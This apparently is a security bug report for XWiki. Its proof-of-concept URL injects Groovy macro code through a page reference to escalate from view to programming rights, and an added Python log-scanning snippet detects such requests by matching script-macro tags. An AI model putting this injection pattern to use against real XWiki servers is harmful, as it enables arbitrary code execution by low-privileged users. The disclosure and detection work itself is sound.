Details
- Bug
- Resolution: Fixed
- Blocker
- 7.0-rc-1
- Unit
- Unknown
- N/A
- N/A
Description
Steps to reproduce:
Open <xwiki-host>/xwiki/bin/view/%22%5D%5D%20%7B%7Basync%20async%3D%22true%22%20cached%3D%22false%22%20context%3D%22doc.reference%22%7D%7D%7B%7Bgroovy%7D%7Dprintln(%22Hello%20%22%20%2B%20%22from%20groovy!%22)%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D?sheet=SkinsCode.XWikiSkinsSheet&xpage=view, where <xwiki-host> is the URL of your XWiki installation, as guest or as any user with view rights.
Expected result:
Two list items with "Edit this skin" and "Test this skin" are displayed without any further text.
Actual result:
The second list item is "Test this skin Hello from groovy!.WebHome"]]". This shows that the Groovy macro has been executed and thus demonstrates a privilege escalation from view rights to programming rights.
This should be exploitable since XWiki 7.0-rc-1, the version in which the sheet SkinsCode.XWikiSkinsSheet was introduced as part of XWIKI-11803.
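For operators who want to spot this class of request in web server logs, the following is an added detection example (not code from the report or from the XWiki project). It percent-decodes the document reference in `/bin/view/` requests and flags any that carries wiki macro syntax for a script macro (`{{groovy}}`, `{{velocity}}`, `{{python}}`) or the `{{async}}` wrapper used above; the log lines and IP addresses are constructed for the example.

```python
import re
from urllib.parse import unquote, urlsplit, parse_qs

# Constructed sample access-log lines. The first mirrors the request shape from the
# steps to reproduce (with a harmless println); the other two are benign requests.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /xwiki/bin/view/%22%5D%5D%20%7B%7Basync%20async%3D%22true%22%7D%7D%7B%7Bgroovy%7D%7Dprintln(1)%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D?sheet=SkinsCode.XWikiSkinsSheet&xpage=view HTTP/1.1" 200 1234
10.0.0.6 - - [01/Jan/2024:10:00:01 +0000] "GET /xwiki/bin/view/Main/WebHome HTTP/1.1" 200 5678
10.0.0.7 - - [01/Jan/2024:10:00:02 +0000] "GET /xwiki/bin/view/XWiki/DefaultSkin?sheet=SkinsCode.XWikiSkinsSheet HTTP/1.1" 200 910
"""

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')
# Opening or closing tag of a script macro, or of the {{async}} wrapper, in decoded text.
SCRIPT_MACRO_RE = re.compile(r"\{\{\s*/?\s*(groovy|velocity|python|async)\b", re.IGNORECASE)


def request_target(line):
    """Return the raw request target (path and query) from a combined-log line, or None."""
    m = REQUEST_RE.search(line)
    return m.group(1) if m else None


def is_macro_injection(target):
    """True when the percent-decoded document reference of a /bin/view/ URL contains
    script-macro syntax; a reference is a page name and should never contain {{...}}."""
    path = unquote(urlsplit(target).path)
    if "/bin/view/" not in path:
        return False
    reference = path.split("/bin/view/", 1)[1]
    return bool(SCRIPT_MACRO_RE.search(reference))


def flag_suspicious(log_text):
    """Return (client_ip, decoded_path, sheet_param) for every suspicious request."""
    hits = []
    for line in log_text.splitlines():
        target = request_target(line)
        if target and is_macro_injection(target):
            parts = urlsplit(target)
            sheet = parse_qs(parts.query).get("sheet", [""])[0]
            hits.append((line.split(" ", 1)[0], unquote(parts.path), sheet))
    return hits


if __name__ == "__main__":
    for ip, path, sheet in flag_suspicious(SAMPLE_LOG):
        print(f"{ip} requested macro-bearing reference {path!r} with sheet={sheet!r}")
```

Only the first constructed line is reported; a legitimate request that merely uses `?sheet=SkinsCode.XWikiSkinsSheet` is not flagged, since the decision is made on the decoded reference, not on the sheet parameter.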